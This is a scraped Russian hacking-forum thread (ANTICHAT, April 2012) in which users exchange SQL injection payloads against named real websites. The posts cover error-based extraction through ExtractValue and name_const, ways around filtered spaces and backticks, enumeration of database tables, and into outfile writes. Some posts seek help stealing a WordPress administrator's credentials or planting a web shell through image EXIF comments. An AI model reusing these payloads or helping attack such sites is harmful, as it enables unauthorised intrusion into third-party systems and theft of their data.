ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.04.2012, 05:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
asiaman
Версия >= 5.1, поэтому можно использовать ф-цию ExtractValue, через которую можно вывести уже все
http://allinstyle.ru/?index.php'AND(extractvalue(1,concat(0x3a,version( ))))and'1
Ну или:
https://rdot.org/forum/showpost.php?p=20287&postcount=12
|
|
|
18.04.2012, 05:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
10268
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
asiaman
Скуля там в URI.
http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)
http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE ()
Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).
Вывод версии в ошибке:
http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1
Duplicate column name '
5.0.88-log
'
asiaman
Версия >= 5.1, поэтому можно использовать ф-цию ExtractValue, через которую можно вывести уже все
http://allinstyle.ru/?index.php'AND(extractvalue(1,concat(0x3a,version( ))))and'1
Ну или:
https://rdot.org/forum/showpost.php?p=20287&postcount=12
Про ф-цию ExtractValue, спасибо. Она работает в старших версиях.
Но вот в http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1 как быть?
Вариант
Код:
Code:
предложил использовать `` в name_const
в
Код:
Code:
1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
выдает ошибку.
З.Ы. Ваши ответы я вообще себе в блокнот сразу копирую. Очень полезные, уникальны (по крайней мере для меня) и часто универсальные. Спасибо.
________________________________________________
Например, если ругается на этот символ ` , т.е. https://rdot.org/forum/showpost.php?p=20287&postcount=12 не проходит в запросе этот символ. На что можно его заменить?
|
|
|
|
18.04.2012, 06:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
asiaman
Там же написано. Запросы надо посылать не через браузер.
Сообщение от None
GET http://develop.belta.by/1'and(1)=(select*from(select*from(information_sche ma.tables`a`)JOIN(information_schema.tables`b`)usi ng(TABLE_CATALOG,TABLE_SCHEMA))c)='1
Результат:
Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору.
Duplicate column name ' TABLE_NAME'
Данная реализация не идеальна, но имеет место быть.
В твоих скулях не получиться много чего извлечь даже через ExtactValue, т.к. limit'ом без пробелов пользоваться нельзя, а без limit'ов будет FAIL (при выдергивании инфы из табличек).
|
|
|
|
18.04.2012, 07:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
10268
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
asiaman
Там же написано. Запросы надо посылать не через браузер.
Результат:
Ошибка при работе с базой данных. Пожалуйста, обратитесь к администратору.
Duplicate column name '
TABLE_NAME
'
Данная реализация не идеальна, но имеет место быть.
В твоих скулях не получиться много чего извлечь даже через ExtactValue, т.к. limit'ом без пробелов пользоваться нельзя, а без limit'ов будет FAIL (при выдергивании инфы из табличек).
tnx
а как Вам такая реализация?
1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1
в смысле используя like и data_length
|
|
|
|
18.04.2012, 07:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от asiaman
asiaman said:
tnx
а как Вам такая реализация?
1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1
в смысле используя like и data_length
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like(' TABLE%')))))='1
error - Subquery returns more than 1 row
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like(' VIEWS%')))))='1
error - XPATH syntax error: ': information_schema.VIEWS'
Опять же, все упирается в LIMIT.
|
|
|
|
18.04.2012, 09:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
10268
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like('
TABLE
%')))))='1
error - Subquery returns more than 1 row
http://allinstyle.ru/?index.php1'or(ExtractValue(1,concat(0x3a,(select( concat(table_schema,'.',table_name))from(informati on_schema.tables)where(table_name)like('
VIEWS
%')))))='1
error - XPATH syntax error: ':
information_schema.VIEWS
'
Опять же, все упирается в LIMIT.
от части. оператор like - это смысловой оператор. но с грехом по пополам - можно работать. хотя, я посмотрю. где-то увидел интересный шаблон, там через chr обходит все и даже пробелы работают.
__________
погарячился.
Код:
Code:
You don't have permission to access
|
|
|
|
18.04.2012, 19:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
36102
Репутация:
0
|
|
Посоны, 403 на union
Способы обойти есть, или забыть?
|
|
|
|
18.04.2012, 20:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
2714
Репутация:
0
|
|
Помогите пожалуйста с WP 2.9.2
при переходе на _tp://www.site.com/?p=0 открывает главную страницу, но url в строке не меняется на _tp://www.site.com/
А при переходе на _tp://www.site.com/?p=1 выдаёт
Сообщение от None
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND meta_value!='' ORDER BY meta_key ASC' at line 1]
SELECT * FROM wp_krivov_foot34_postmeta WHERE post_id = AND meta_value!='' ORDER BY meta_key ASC
и
Сообщение от None
Извините, не найдено записей совпадающих вашим критериям
как мне подобраться к базе, вытащить лог. пасс. админа? Заранее спасибо |
|
|
|
19.04.2012, 07:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
10268
Репутация:
0
|
|
Вопрос следующего плана: заливка шелла через картинку.
Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка.
Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал.
Прошу подсказать варинты. Или забить?
|
|
|
|
19.04.2012, 11:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+
что не так?Помогите докрутить.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
